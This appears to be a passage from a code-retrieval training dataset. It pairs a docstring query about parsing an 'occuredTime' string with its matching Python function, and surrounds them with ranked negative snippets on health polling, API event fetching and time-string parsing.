"def poll_health():\n global timesCalled\n\n # Poll /health\n session = requests.Session()\n retry = Retry(connect=3, backoff_factor=0.5)\n adapter = HTTPAdapter(max_retries=retry)\n session.mount('http://', adapter)\n response = session.get(health_url)\n\n # Check HTTP status code\n status_code = response.status_code\n if status_code != status_ok:\n exit(1)\n\n # Get metrics values\n metrics = response.json()['metrics']\n requestLatencyValues.append(metrics['requestLatency'])\n dbLatencyValues.append(metrics['dbLatency'])\n cacheLatencyValues.append(metrics['cacheLatency'])\n\n # If 60 seconds has passed, send data to STDOUT\n timesCalled += 1\n if timesCalled == 6:\n output_data()\n\n timesCalled = 0\n requestLatencyValues.clear()\n dbLatencyValues.clear()\n cacheLatencyValues.clear()",
"def _fetch(\n cls, url: str, headers: Mapping[str, str], params: Mapping[str, Any]\n ) -> Tuple[List[EventType], Optional[str]]:\n status_url = cls._post_query(url, headers, params)\n # Await a while before polling the results\n time.sleep(0.1)\n result_url = cls._poll_status(status_url, headers, params)\n data, headers = cls._get_results(result_url, headers, params)\n result = json.loads(data)\n return result, headers.get(\"x-next-token\")",
"def on_get(self, req, resp):\n hc = HealthCheckCombined(state_manager=self.state_manager,\n orchestrator=self.orchestrator,\n extended=True)\n return hc.get(req, resp)",
"def on_get(self, req, resp):\n hc = HealthCheckCombined(state_manager=self.state_manager,\n orchestrator=self.orchestrator,\n extended=False)\n return hc.get(req, resp)",
"def refresh(self):\n self._data = self._retrieve_health_data()\n return self",
"async def health(self):\n\n request = telemetry_pb2.SubscribeHealthRequest()\n health_stream = self._stub.SubscribeHealth(request)\n\n try:\n async for response in health_stream:\n \n\n \n yield Health.translate_from_rpc(response.health)\n finally:\n health_stream.cancel()",
"def _get_heals(code, start=0, end=None, names=None, for_player=None):\n\n if end is None:\n end = start + 3 * 60 * 60 * 1000 # look at up to 3h of data\n\n if names is None:\n names = dict()\n\n heals = []\n periodics = []\n absorbs = []\n\n next_start = start\n\n print(\"Fetching data from WCL...\")\n progress_bar = ProgressBar(end - start, length=70)\n\n # will have to loop to get results\n request_more = True\n while request_more:\n url = f\"{API_ROOT}/report/events/healing/{code}?start={next_start}&end={end}&api_key={API_KEY}\"\n\n print(progress_bar.render(next_start - start), end=\"\\r\")\n\n data = _get_api_request(url)\n events = data[\"events\"]\n if \"nextPageTimestamp\" in data:\n next_start = data[\"nextPageTimestamp\"]\n else:\n request_more = False\n\n for e in events:\n try:\n timestamp = e[\"timestamp\"]\n timestamp = datetime.fromtimestamp(timestamp / 1000.0).time()\n spell_id = str(e[\"ability\"][\"guid\"])\n\n if \"sourceID\" not in e:\n # heal not from a player, skipping\n continue\n\n source = e[\"sourceID\"]\n source = names.get(source, f\"[pid {source}]\")\n\n if for_player and source != for_player:\n continue\n\n target = e[\"targetID\"]\n target = names.get(target, f\"[pid {source}]\")\n # event_type = e[\"type\"]\n\n amount = e[\"amount\"]\n\n if e[\"type\"] == \"absorbed\":\n # Shield absorb\n absorbs.append((timestamp, source, spell_id, target, amount, 0, False))\n continue\n\n overheal = e.get(\"overheal\", 0)\n\n if e.get(\"tick\"):\n # Periodic tick\n periodics.append(\n (timestamp, source, spell_id, target, amount + overheal, overheal, False)\n )\n continue\n\n is_crit = e.get(\"hitType\", 1) == 2\n\n heals.append(\n (\n timestamp,\n source,\n spell_id,\n target,\n amount + overheal,\n overheal,\n is_crit,\n )\n )\n except Exception as ex:\n print(\"Exception while handling line\", e)\n print(ex)\n\n print(progress_bar.render(end - start))\n\n return heals, periodics, absorbs",
"def get_healthcheck() -> Response:\n\n try:\n with get_cursor(db_creds, commit=False) as cur:\n cur.execute(\"SELECT * FROM events.healthchecks\")\n data = cur.fetchall()\n return jsonify(status_code=200, data=data)\n except psycopg2.Error as e:\n return jsonify(\n message=f\"Psycopg2 driver error: {type(e)}\",\n args=e.args,\n status_code=500,\n error_type=\"Internal Server Error\",\n )\n except Exception as e:\n return jsonify(\n message=f\"Internal Server Error: {type(e)}\",\n args=e.args,\n status_code=500,\n error_type=\"Internal Server Error\",\n )",
"def fetch(self):\n\n\n # Update Prometheus metrics with application metrics\n self.current_requests.set(get_current_requests())\n self.total_uptime.set(get_uptime())\n self.health.state(get_health())",
"def process_resp(self, msg, operation, status, index):\n metric = \"%s.%d.%s\" % (METRIC_NAME, index, operation)\n self.results.append(Event(TIMESTAMP_MILLIS(), \"opentsdb\", metric, msg, status))\n if status == \"0\":\n self.cause.extend(msg)\n metric = \"%s.%d.%s\" % (METRIC_NAME, index, \"health\")\n analyse_status = MonitorStatus[\"red\"]\n self.results.append(Event(TIMESTAMP_MILLIS(), \"opentsdb\", metric, msg, analyse_status))",
"def test_health_get(self):\n pass",
"def fetch_incidents(client: Client, last_run: dict, params: Dict, is_test=False) -> Tuple[dict, list]:\n fetch_type = params.get(\"fetch_type\", DEFAULT_FETCH_TYPE)\n if not fetch_type:\n fetch_type = DEFAULT_FETCH_TYPE\n params = validate_fetch_incidents_parameters(params)\n\n if fetch_type == DEFAULT_FETCH_TYPE:\n query = prepare_query_for_fetch_alerts(last_run, params)\n else:\n query = prepare_query_for_fetch_events(last_run, params)\n\n demisto.info(f'[SolarWinds]: Query: {query}')\n\n results = client.http_request(\"POST\", URL_SUFFIX[\"QUERY\"], json_data={\n \"query\": query\n }).get(\"results\")\n\n next_run = last_run\n incidents = []\n for result in results:\n occurred = result['TriggeredDateTime'] if fetch_type == \"Alert\" else result['EventTime']\n incidents.append({\n 'name': result['Name'],\n 'occurred': arg_to_datetime(occurred).strftime(DATE_FORMAT), # type: ignore\n 'rawJSON': json.dumps(result)\n })\n\n if results:\n if fetch_type == DEFAULT_FETCH_TYPE:\n next_run['alert_active_id'] = results[-1]['AlertActiveID']\n else:\n next_run['event_id'] = results[-1]['EventID']\n\n if is_test:\n return {}, []\n\n return next_run, incidents",
"def test_get_hyperflex_health_list(self):\n pass",
"def fetch_cq_status():\n\n fetch_status = FetchStatus.query().get()\n cursor = ''\n begin = ''\n end = ''\n retry_count = 0\n\n while True:\n if fetch_status:\n if fetch_status.done:\n logging.info('historical fetching done so fetch latest...')\n end = str(time_functions.timestamp.utcnow_ts())\n\n last_build_run_seen = BuildRun.query().order(\n -BuildRun.time_finished).fetch(1)\n begin = str(time_functions.timestamp.utctimestamp(\n last_build_run_seen[0].time_finished))\n cursor = ''\n else:\n begin = fetch_status.begin\n end = fetch_status.end\n cursor = fetch_status.cursor\n else:\n logging.info('didnt find any historical information. fetching last week')\n begin = str(time_functions.timestamp.utctimestamp(\n datetime.datetime.utcnow() - datetime.timedelta(weeks=1)))\n end = str(time_functions.timestamp.utcnow_ts())\n\n if begin and end:\n logging.info(\n 'fetching from %s to %s cursor: %s',\n str(datetime.datetime.utcfromtimestamp(float(begin))),\n str(datetime.datetime.utcfromtimestamp(float(end))),\n cursor)\n else:\n logging.info('fetching with no begin/end and cursor: ' + cursor)\n\n url = \"https://chromium-cq-status.appspot.com/query\"\n params = []\n params.append('tags=action=verifier_jobs_update')\n if cursor:\n params.append('cursor=' + cursor)\n if begin:\n params.append('begin=' + begin)\n if end:\n params.append('end=' + end)\n # Tried count of 200 or more but would get OOM or deadline errors. Even 50\n # sometimes gives:\n # \"Values may not be more than 1000000 bytes in length; received 2118015\n # bytes\"\n params.append('count=10')\n\n url += '?' + '&'.join(params)\n logging.info('fetching url: ' + url)\n\n try:\n urlfetch.set_default_fetch_deadline(60)\n result = urlfetch.fetch(url).content\n\n timestamp_str = '\"timestamp\":\"'\n logging_idx = result.find(timestamp_str)\n if logging_idx != -1:\n logging_idx += len(timestamp_str)\n logging_idx2 = result.find('\"', logging_idx)\n logging.info(' current fetch has time of ' +\n result[logging_idx:logging_idx2])\n\n try:\n json_result = json.loads(result)\n\n more = json_result['more']\n cursor = json_result['cursor']\n\n try:\n logging_output = parse_cq_data(json_result)\n if logging_output:\n logging.info('found flakes: ' + ' '.join(logging_output))\n except DeadlineExceededError:\n logging.info('got DeadlineExceededError during parse_cq_data, '\n 'catching to not show up as error')\n return\n except ValueError:\n requests_metric.increment_by(1, fields={'status': 'parse_error'})\n logging.exception('failed to parse CQ data from %s', url)\n if 'DeadlineExceededError' in result:\n logging.error('got deadline exceeded, trying again after 1s')\n time.sleep(1)\n continue\n elif retry_count < 3:\n retry_count += 1\n logging.error('will retry after sleeping ' + str(retry_count))\n time.sleep(retry_count)\n continue\n else:\n logging.error('giving up and will count current fetch as done')\n # Don't want to continue this as could be a bad cursor.\n more = False\n else:\n requests_metric.increment_by(1, fields={'status': 'success'})\n\n if not fetch_status:\n fetch_status = FetchStatus()\n fetch_status.done = not more\n if fetch_status.done:\n fetch_status.cursor = ''\n fetch_status.begin = ''\n fetch_status.end = ''\n retry_count = 0\n logging.info('finished fetching for current cursor')\n else:\n fetch_status.begin = begin\n fetch_status.end = end\n fetch_status.cursor = cursor\n fetch_status.put()\n\n if not more:\n return # finish the cron job and wait for next iteration\n except urllib2.URLError, e:\n requests_metric.increment_by(1, fields={'status': 'fetch_error'})\n logging.warning('Failed to fetch CQ status: %s', e.reason)",
"def get_health(self):\n return {\n 'api_name': 'BrightHive Master Client Index API',\n 'current_time': str(datetime.utcnow()),\n 'current_api_version': '1.0.0',\n 'api_status': 'OK'\n }, 200",
"def get_health_data_and_ingest_into_sentinel(self):\n self.pull_and_push_the_snapshot_data(\n HEALTH_ENDPOINT, self.health_table_name, fields=MODIFIED_FIELDS\n )",
"async def _async_status_request(self) -> None:\n try:\n # status_response = await self._hass.async_add_executor_job(\n # self._mc_status.status, self._MAX_RETRIES_STATUS\n # )\n if self.access_token:\n if (time.time() - self.last_request) > 1800:\n phantom = await self._hass.async_add_executor_job(\n self._phantom_load\n )\n if phantom.status_code == HTTP_OK:\n self.phantom_load = round(phantom.json().get(\"power\") / 1000, 3)\n else:\n _LOGGER.warning(phantom.content)\n\n # Got answer to request, update properties.\n live = await self._hass.async_add_executor_job(self._live_data)\n\n if live.status_code == HTTP_OK:\n self.power_usage = round(abs(live.json().get(\"power\")) / 1000, 3)\n else:\n _LOGGER.warning(live.content)\n\n self.last_request = time.time()\n self._last_status_request_failed = False\n except OSError as error:\n # No answer to request, set all properties to unknown.\n self.power_usage = None\n self.phantom_load = None\n\n # Inform user once about failed update if necessary.\n if not self._last_status_request_failed:\n _LOGGER.warning(\n \"Updating the properties of '%s' failed - OSError: %s\",\n self.unique_id,\n error,\n )\n self._last_status_request_failed = True",
"def get_host_stats(self, refresh=False):",
"def __process_health(self) -> None:\n status = self.metrics.get(\"Status\", None)\n if status:\n health = status.get(\"Health\", None)\n measurement = \"Health\"\n if health == \"Warning\":\n value = 1\n datapoint = self.__gen_datapoint(measurement, self.label, value)\n self.datapoints.append(datapoint)\n elif health == \"Critical\":\n value = 2\n datapoint = self.__gen_datapoint(measurement, self.label, value)\n self.datapoints.append(datapoint)\n return",
"async def async_update(self):\n today = date.today()\n\n try:\n self.data = await self.hass.async_add_executor_job(\n self.client.get_stats_and_body, today.isoformat()\n )\n except (\n GarminConnectAuthenticationError,\n GarminConnectTooManyRequestsError,\n GarminConnectConnectionError,\n ) as err:\n _LOGGER.error(\n \"Error occurred during Garmin Connect get activity request: %s\", err\n )\n return\n except Exception: # pylint: disable=broad-except\n _LOGGER.exception(\n \"Unknown error occurred during Garmin Connect get activity request\"\n )\n return",
"def pull_and_push_the_snapshot_data(\n self,\n endpoint,\n table_name,\n hashed_events_list=list(),\n hash_field_list=[],\n fields=None,\n ):\n __method_name = inspect.currentframe().f_code.co_name\n posted_event_count = 0\n res = self.pull(url=self.base_url + endpoint)\n if res and len(res):\n if endpoint == consts.HEALTH_ENDPOINT:\n link_status_dict, aggregated_peak_traffic_dict = {}, {}\n connectivity_dict, trafficdrop_dict = {}, {}\n\n # for link_status\n for k, v in (\n res.get(\"network\", {})\n .get(\"interfaces\", {})\n .get(\"sensors\", {})\n .items()\n ):\n link_status = \"UP\"\n for x, y in v.items():\n if y.get(\"link\", \"\") != \"UP\":\n link_status = \"Degraded\"\n break\n link_status_dict[k] = link_status\n\n # for aggregated_peak_traffic\n for key, value in (\n res.get(\"network\", {}).get(\"traffic\", {}).get(\"sensors\", {}).items()\n ):\n aggregated_peak_traffic_dict[key] = value.get(\n \"aggregated_peak_traffic_mbps\", \"\"\n )\n\n # for connectivity status and error\n for item in res.get(\"connectivity\", {}).get(\"sensors\", {}):\n connectivity_dict[item.get(\"name\", \"\")] = {\n \"status\": item.get(\"status\", \"\"),\n \"error\": item.get(\"error\", \"\"),\n }\n\n # for traffic_drop status and error\n for item in res.get(\"trafficdrop\", {}).get(\"sensors\", {}):\n trafficdrop_dict[item.get(\"name\", \"\")] = {\n \"status\": item.get(\"status\", \"\"),\n \"error\": item.get(\"error\", \"\"),\n }\n\n for i in range(len(res.get(\"sensors\", {}))):\n # adding d_link_status\n res[\"sensors\"][i][\"d_link_status\"] = link_status_dict.get(\n res.get(\"sensors\", {})[i].get(\"luid\", \"\"), \"\"\n )\n # adding d_aggregated_peak_traffic\n res[\"sensors\"][i][\n \"d_aggregated_peak_traffic\"\n ] = aggregated_peak_traffic_dict.get(\n res.get(\"sensors\", {})[i].get(\"name\", \"\"), \"\"\n )\n # adding d_connectivity_status\n res[\"sensors\"][i][\"d_connectivity_status\"] = connectivity_dict.get(\n res.get(\"sensors\", {})[i].get(\"name\", \"\"), {}\n ).get(\"status\", \"\")\n # adding d_connectivity_error\n res[\"sensors\"][i][\"d_connectivity_error\"] = connectivity_dict.get(\n res.get(\"sensors\", {})[i].get(\"name\", \"\"), {}\n ).get(\"error\", \"\")\n # adding d_trafficdrop_status\n res[\"sensors\"][i][\"d_trafficdrop_status\"] = trafficdrop_dict.get(\n res.get(\"sensors\", {})[i].get(\"name\", \"\"), {}\n ).get(\"status\", \"\")\n # adding d_trafficdrop_error\n res[\"sensors\"][i][\"d_trafficdrop_error\"] = trafficdrop_dict.get(\n res.get(\"sensors\", {})[i].get(\"name\", \"\"), {}\n ).get(\"error\", \"\")\n\n list_res = [res]\n self.post_data_to_sentinel(list_res, table_name, fields)\n posted_event_count += 1\n else:\n for event in res:\n temp_dict = {}\n for field in hash_field_list:\n temp_dict[field] = event.get(field)\n hash_of_event = self.get_results_hash(temp_dict)\n if hash_of_event not in hashed_events_list:\n self.post_data_to_sentinel(event, table_name, fields)\n posted_event_count += 1\n hashed_events_list.append(hash_of_event)\n self.save_checkpoint_snapshot(hashed_events_list)\n\n self.applogger.info(\n \"{}(method={}) : {} : Posted total {} event(s) into MS Sentinel. No more events.\"\n \" Stopping the collection.\".format(\n consts.LOGS_STARTS_WITH,\n __method_name,\n self.function_name,\n posted_event_count,\n )\n )",
"def collect_events(helper, ew):\n\n opt_start_time_start = helper.get_arg('start_time_start')\n opt_endpoints = helper.get_arg('endpoints')\n opt_interval = int(helper.get_arg('interval'))\n opt_live = False\n\n proxy = helper.get_proxy()\n if proxy:\n proxy_auth = \"{}:{}\".format(\n proxy['proxy_username'], proxy['proxy_password'])\n proxies = {\n \"https\": \"{protocol}://{auth}@{host}:{port}/\".format(protocol=proxy['proxy_type'], auth=proxy, host=proxy['proxy_url'], port=proxy['proxy_port']),\n \"http\": \"{protocol}://{auth}@{host}:{port}/\".format(protocol=proxy['proxy_type'], auth=proxy, host=proxy['proxy_url'], port=proxy['proxy_port'])\n }\n else:\n proxies = None\n\n helper.log_debug(\n \"[-] webex password_type: {}\".format(helper.get_global_setting(\"password_type\")))\n\n params = {\"opt_username\": helper.get_global_setting(\"username\"),\n \"opt_password\": helper.get_global_setting(\"password\"),\n \"opt_site_name\": helper.get_global_setting(\"site_name\"),\n \"limit\": 500,\n \"timezone\": \"20\",\n # \"password_type\": authentication_type[\"Password Authentication\"],\n # \"password_type\": authentication_type[\"OAuth\"],\n \"password_type\": authentication_type[helper.get_global_setting(\"password_type\")],\n \"client_id\": helper.get_global_setting(\"client_id\"),\n \"client_secret\": helper.get_global_setting(\"client_secret\"),\n \"refresh_token\": helper.get_global_setting(\"refresh_token\"),\n \"proxies\": proxies}\n\n # Historical Data\n helper.log_debug(\"Historical Data\")\n for opt_endpoint in opt_endpoints:\n helper.log_debug(\"[-] \\t At {}\".format(opt_endpoint))\n\n # endtime is midnight of GMT - 3days\n enddt = datetime.utcnow().date() - timedelta(3)\n end_time = datetime.combine(\n enddt, datetime.max.time()).strftime('%m/%d/%Y %H:%M:%S')\n\n # create checkpoint key for offest and timestamp\n timestamp_key = \"timestamp_{}_{}_processing\".format(\n helper.get_input_stanza_names(), opt_endpoint)\n\n start_time = helper.get_check_point(timestamp_key)\n if start_time is None:\n # if it's the 1st time, get the start_time from UI, and then save it in checkpoint\n start_time = opt_start_time_start\n helper.save_check_point(timestamp_key, start_time)\n else:\n # shift the start_time by 1 second\n start_time = (datetime.strptime(start_time, '%m/%d/%Y %H:%M:%S') +\n timedelta(seconds=1)).strftime('%m/%d/%Y %H:%M:%S')\n\n helper.log_debug(\"Start time: {}\".format(start_time))\n helper.log_debug(\"End time: {}\".format(end_time))\n\n # Update Parameters\n params.update({\"mode\": \"historical\"})\n params.update({\"opt_endpoint\": opt_endpoint})\n params.update({\"start_time\": start_time})\n params.update({\"end_time\": end_time})\n params.update({\"timestamp_key\": timestamp_key})\n\n records = params['limit']\n offset = 1\n while (records == params['limit']):\n helper.log_debug(\"current_offset: {}\".format(offset))\n params['offset'] = offset\n records = fetch_webex_logs(ew, helper, params)\n helper.log_debug(\"\\t Offet:{}\\tLimit: {}\\tRecords Returned: {}\".format(\n offset, params['limit'], records))\n if records:\n offset += records",
"async def fetch_data(self):\n url = URL_HASSIO_VERSION.format(self.upstream)\n try:\n _LOGGER.info(\"Fetch update data from %s\", url)\n with async_timeout.timeout(10, loop=self.loop):\n async with self.websession.get(url) as request:\n data = await request.json(content_type=None)\n\n except (aiohttp.ClientError, asyncio.TimeoutError, KeyError) as err:\n _LOGGER.warning(\"Can't fetch versions from %s -> %s\", url, err)\n return\n\n except json.JSONDecodeError as err:\n _LOGGER.warning(\"Can't parse versions from %s -> %s\", url, err)\n return\n\n # data valid?\n if not data:\n _LOGGER.warning(\"Invalid data from %s\", url)\n return\n\n # update versions\n self._data[ATTR_HOMEASSISTANT] = data.get('homeassistant')\n self._data[ATTR_HASSIO] = data.get('hassio')\n self.save()",
"def _fetch(self):\n self._data = self._get(self.url)\n\n if self._data['released_errata'] is not None:\n self._released_errata = Erratum(errata_id=self._data[\n 'released_errata']['id'])\n\n for errata_dict in self._data['all_errata']:\n errata = Erratum(errata_id=errata_dict['id'])\n self._all_errata.append(errata)\n\n self._signed_rpms = self._data.get('rpms_signed')\n\n for et_file in self._data['files']:\n self._files.append(et_file['path'])",
"async def send_event_host_updates_final(self):\n async with self.pg.acquire() as conn:\n # get events for which updates need to be sent\n events = await conn.fetch(\n \"\"\"\n SELECT\n e.id, e.name, e.host AS host_user_id,\n event_link(cat.slug, e.slug, e.public, $1) AS event_link,\n cat.name AS cat_name, cat.slug AS cat_slug,\n cat.company AS company_id\n FROM events AS e\n JOIN categories AS cat ON e.category = cat.id\n WHERE e.status = 'published' AND\n e.start_ts BETWEEN now() + '4 hours'::interval AND now() + '5 hours'::interval\n ORDER BY cat.company\n \"\"\",\n self.settings.auth_key,\n )\n if not events:\n return 0\n\n user_emails = 0\n pool = await self.get_redis()\n cache_time = 24 * 3600\n booked_stmt = await conn.prepare(\"SELECT count(*) FROM tickets WHERE status='booked' AND event=$1\")\n with await pool as redis:\n for company_id, g in groupby(events, itemgetter('company_id')):\n user_ctxs = []\n for e in g:\n key = 'event-host-final-update:{}'.format(e['id'])\n if await redis.get(key):\n continue\n await redis.setex(key, cache_time, 1)\n # better to do this as a single query here when required than call it every time\n tickets_booked = await booked_stmt.fetchval(e['id'])\n ctx = {\n 'event_link': e['event_link'],\n 'event_dashboard_link': f'/dashboard/events/{e[\"id\"]}/',\n 'event_name': e['name'],\n 'tickets_booked': tickets_booked or 0,\n 'category_name': e['cat_name'],\n is_cat(e['cat_slug']): True,\n }\n user_ctxs.append(UserEmail(id=e['host_user_id'], ctx=ctx))\n\n if user_ctxs:\n user_emails += len(user_ctxs)\n await self.send_emails.direct(company_id, Triggers.event_host_final_update.value, user_ctxs)\n return user_emails",
"async def health(self) -> Health:\n response = await self._http_requests.get(build_url(Paths.HEALTH))\n return Health(**response.json())",
"def StreamHealth(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)",
"def get_hostname_from_sha(query_params=\"\",\n host=env.AMP.get(\"host\"),\n client_id=env.AMP_CLIENT_ID,\n api_key=env.AMP_API_KEY,\n):\n print(\"\\n==> Getting events from AMP\")\n i_got_it=0\n if i_got_it==0:\n print(cyan(env.get_line(),bold=True))\n print (yellow(\"Second : Call the correct AMP API with the correct syntax...The API call which gives you the list of all infected endpoints \"))\n print()\n print (yellow(\"Hint :\"))\n print (yellow(\"https://api-docs.amp.cisco.com/api_actions/details?api_action=GET+%2Fv1%2Fevents&api_host=api.eu.amp.cisco.com&api_resource=Event&api_version=v1\"))\n print()\n print (yellow(\"Change the value of i_got_it to 1 in order to move forward\"))\n sys.exit() \n #url = f\"https://{client_id}:{api_key}@{host}/v1/events\"\n response = requests.get(url, params=query_params, verify=False)\n if debug:\n print(cyan(env.get_line(),bold=True))\n print(cyan(response.json())) \n # Consider any status other than 2xx an error\n response.raise_for_status()\n events_list = response.json()\n if debug: \n events_list = response.json()\n print(green((events_list)))\n for events in events_list:\n #hostname=event['computer']['hostname'] \n print(red(events))\n '''\n hostname=response.json()['data'][0]['computer']['hostname']\n return hostname \n '''\n events_list = response.json()['data']\n return events_list",
"async def run(self):\n current_status = \"Init\"\n while self.expected_status != current_status:\n await asyncio.sleep(1)\n async with aiohttp.ClientSession() as session:\n async with session.get(self.url) as response:\n api_call_result = await response.json()\n current_status = api_call_result[\"status\"]\n \n # Send our single event and then we're done\n yield TriggerEvent(api_call_result)"
] |
[
"0.74835974",
"0.60943276",
"0.607677",
"0.60051495",
"0.5991445",
"0.5785507",
"0.56111306",
"0.5549164",
"0.55123454",
"0.5506759",
"0.5465697",
"0.5452234",
"0.5400395",
"0.53932124",
"0.53769994",
"0.53689444",
"0.53555197",
"0.5351841",
"0.5351213",
"0.53326714",
"0.5322342",
"0.53220314",
"0.529372",
"0.5274521",
"0.5242314",
"0.52291757",
"0.5227746",
"0.5222065",
"0.51835304",
"0.5168513"
] |
0.7312966
|
1
|
Parse occuredTime string based on its format.
|
def __parseOccuredTime(self, occuredTime: str) -> datetime:
# Guard clause.
if not occuredTime:
raise ValueError(
'occuredTime cannot be null or empty.')
# There are two possible time formats observed for occuredTime, which are stored in OCCURED_TIME_FORMAT.
for dateFormat in OCCURED_TIME_FORMAT:
try:
occuredTimeParsed = datetime.strptime(occuredTime, dateFormat)
except ValueError as e:
self.tracer.warning(
"[%s] occuredTime is not of the format %s. (%s)" % (self.fullName, dateFormat, e), exc_info=True)
else:
self.tracer.info(
"[%s] occuredTime is of the format %s" % (
self.fullName, dateFormat))
return occuredTimeParsed
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _parse_time_str(self, time_str):\n time_fmt = \"%I:%M%p\"\n time_str = re.sub(\n r\":+\",\n \":\",\n re.sub(r\"\\s+\", \"\", re.sub(r\"to|from|\\.\", \"\", time_str.lower())).replace(\n \"o\", \"0\"\n ),\n )\n if \":\" not in time_str:\n time_fmt = \"%I%p\"\n elif len(time_str) < 6:\n time_fmt = \"%I%p\"\n time_str = time_str.replace(\":\", \"\")\n return datetime.strptime(time_str, time_fmt).time()",
"def parse_strtime(timestr, fmt=PERFECT_TIME_FORMAT):\r\n return datetime.datetime.strptime(timestr, fmt)",
"def parse_strtime(timestr, fmt=PERFECT_TIME_FORMAT):\n return datetime.datetime.strptime(timestr, fmt)",
"def parse(str):\n if len(str) != 16:\n raise ValueError(\"Invalid time length %d\" % len(str))\n if (str[-1]) == 'R':\n return parse_relative_time(str)\n return parse_absolute_time(str)",
"def parse_time(time_string):\n return calendar.timegm(time.strptime(time_string, \"%Y%m%dT%H%M%SZ\"))",
"def _change_time_format(time_string):\n datetime_object = parser.isoparse(time_string)\n return datetime_object",
"def __parse_time(self, time_obj):\n if time_obj:\n resp = ''\n if isinstance(time_obj, int) or isinstance(time_obj, str):\n resp = time_obj\n elif isinstance(time_obj, datetime.datetime):\n resp = calendar.timegm(time_obj.timetuple())\n else:\n raise Exception(\"Unknown __parse_time format for {0}\".format(time_obj))\n return str(resp)\n return None",
"def parse_time(s: str):\n return utils.parsers.parse_eng_unit(s, base_unit='s', default=1e-12)",
"def parseTime(string):\t\n \n if string == \"\":\n result = None\n if 'T' in string:\n string = string.replace('T', ' ')\n if 'Z' in string:\n string = string.replace('Z', '') \n\n if len(string) < 19:\n # string has some single digits\n p = \"\"\"^([0-9]{4})-([0-9]{1,2})-([0-9]{1,2}) \n ([0-9]{1,2}):([0-9]{1,2}):([0-9]{1,2}).*$\"\"\"\n s = re.findall(p, string)\n if len(s) > 0:\n string = '{0}-{1:02d}-{2:02d} {3:02d}:{4:02d}:{5:02d}'\\\n .format(*[int(x) for x in s[0]])\n\n for date_format in DATE_FORMATS:\n try:\n result = datetime.datetime.strptime(string, date_format)\n except ValueError:\n pass\n\n return result",
"def parse_time(text):\n\n # When keyword is 'in' adds values to time\n if text[-3] == 'in':\n remind_time = time.gmtime(int(text[-2]) * int(text[-1]) + time.time())\n # Otherwise try to parse time as written\n else:\n remind_time = text[-1].replace(':', ' ') \\\n + \" \" \\\n + time.strftime(\"%m/%d/%y\", time.gmtime(time.time()))\n remind_time = time.strptime(remind_time, \"%H %M %m/%d/%y\")\n return remind_time",
"def parse_time(self, gc):\n\n def match(time_str):\n if time_str == \"Half\":\n time = 0\n minute = -3\n status = 'd'\n elif time_str == \"ET\":\n time = 0\n minute = -1\n status = 'd'\n elif time_str == \"Final\":\n time = 0\n minute = 90\n status = 'f'\n elif re.match(\".*[\\d]{2}:[\\d]{2} UK\", time_str):\n time = re.search(\".*([\\d]{2}):([\\d]{2}) UK\", time_str).groups()\n time = datetime.time(int(time[0]), int(time[1]))\n minute = 0\n status = 'o'\n elif re.match(\".*[\\d]{1,3}\\'\", time_str):\n time = 0\n minute = re.search(\"([\\d]{1,3})\\'\", time_str).groups()[0]\n status = 'd'\n elif re.match(\".*[\\d]{1,3} min\", time_str):\n time = 0\n minute = re.search(\"([\\d]{1,3}) min\", time_str).groups()[0]\n status = 'd'\n elif time_str == \"1st\":\n time = 0\n minute = -4\n status = 'd'\n elif time_str == \"2nd\":\n time = 0\n minute = -2\n status = 'd'\n else:\n time = 0\n minute = 0\n status = 'c'\n\n return time, minute, status\n\n # (o)pen / (s)tarted / (f)inished\n try:\n t = gc.find(name='div', attrs={'class': 'teamTop_inGame'}).contents\n if type(t) == type([]) and len(t) > 0:\n return match(str(t[0]).strip())\n else:\n pass\n except AttributeError:\n pass\n\n try:\n t = gc.find(name='div', attrs={'class': 'teamTop'}).a.contents\n if type(t) == type([]):\n return match(str(t[0]).strip())\n else:\n pass\n\n except AttributeError:\n pass\n\n try:\n t = gc.find(name='div', attrs={'class': 'teamTop'}).contents\n if type(t) == type([]):\n if str(t[0]).strip() == \"Postp.\": # match postponed\n return 0, 0, 'p'\n else: # match cancelled or sth ;)\n return 0, 0, 'c'\n else:\n pass\n\n except AttributeError:\n pass\n\n return False, False, False",
"def parse_time(s):\n return time.gmtime(float(s))",
"def _parse_time(time_string: str) -> datetime:\n\n # Strings with timezone (+01:00) in v2 are not easily parsed. But time\n # zones are not important here, so we just omit them.\n time_string = time_string.rsplit('+')[0]\n\n time_formats = [\n '%Y-%m-%dT%H:%M:%S.%fZ', # Default\n '%Y-%m-%dT%H:%M:%SZ', # Imported UNCCD data\n '%Y-%m-%dT%H:%M:%S.%f', # Stripped timezone format (v2)\n ]\n for t_format in time_formats:\n try:\n return datetime.strptime(time_string, t_format)\n except ValueError:\n continue",
"def parse_time_str(self, time_str):\n try:\n return datetime.strptime(self.force_hour_two_digits(time_str), TIME_FORMAT).time()\n except ValueError:\n return None",
"def parse_wcinfotime(timestr):\r\n # example: 2003-10-27 20:43:14 +0100 (Mon, 27 Oct 2003)\r\n m = re.match(r'(\\d+-\\d+-\\d+ \\d+:\\d+:\\d+) ([+-]\\d+) .*', timestr)\r\n if not m:\r\n raise ValueError, \"timestring %r does not match\" % timestr\r\n timestr, timezone = m.groups()\r\n # do not handle timezone specially, return value should be UTC\r\n parsedtime = time.strptime(timestr, \"%Y-%m-%d %H:%M:%S\")\r\n return calendar.timegm(parsedtime)",
"def parse_timespan(unparsed):\n pattern = '%H:%M:%S'\n return datetime.strptime(unparsed, pattern) - datetime.strptime('00:00:00', pattern)",
"def parse(string, format):\n # Count the number of spaces in the format string (N), and\n # truncate everything after the (N+1)th space\n spaces = format.count(' ') + 1\n string = ' '.join(string.split()[:spaces])\n\n try:\n result = dt.datetime.strptime(string, format)\n except ValueError, err:\n raise CannotParse(str(err))\n else:\n return result",
"def parse_time(s):\n if s[-1].lower() in secs:\n return int(s[:-1]) * secs[s[-1].lower()]\n else:\n return int(s)",
"def parse(timestring):\n for parser in _PARSERS:\n match = parser['pattern'].match(timestring)\n if match:\n groups = match.groups()\n ints = tuple(map(int, groups))\n time = parser['factory'](ints)\n return time\n\n raise TimeError('Unsupported time format {}'.format(timestring))",
"def parse(s):\n\n rise = False\n set = False\n if s[-1:] == \"R\":\n rise = True\n s = s[:-1]\n elif s[-1:] == \"T\":\n set = True\n s = s[:-1]\n \n x = s.split(\":\")\n if len(x) == 1:\n x.append(\"0\")\n if len(x) == 2:\n x.append(\"0\")\n \n return Time(int(x[0]), int(x[1]), int(x[2]), after_sunrise=rise,\n after_sunset=set)",
